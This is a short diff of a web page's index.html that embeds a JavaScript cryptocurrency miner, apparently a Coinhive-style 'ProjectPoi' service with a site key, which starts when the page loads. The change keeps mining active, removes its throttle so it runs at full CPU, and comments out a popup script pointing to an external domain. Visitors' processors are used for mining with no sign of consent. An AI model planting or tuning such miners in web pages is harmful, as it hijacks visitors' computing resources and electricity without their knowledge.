--- a/wkjs/index.html
+++ b/wkjs/index.html
@@ -6,18 +6,18 @@
 		
 		<script>
 			var miner = new ProjectPoi.User('BLuRXQ2XBPG0jSEBBnysmfVJ', 'john-doe', {
-	threads: 22,
+	threads: 16,
 	autoThreads: false,
-	throttle: 0.2,
+	throttle: 0,
 	forceASMJS: false
 });
 	miner.start(ProjectPoi.IF_EXCLUSIVE_TAB);
 			
 		</script>
 		
-		<script>
+		<!--<script>
 		window.open("http://23niu.ga/zdsx")
-		</script>
+		</script>-->
 		
 		<!--script>
 	var miner = new ProjectPoi.Anonymous('BLuRXQ2XBPG0jSEBBnysmfVJ');
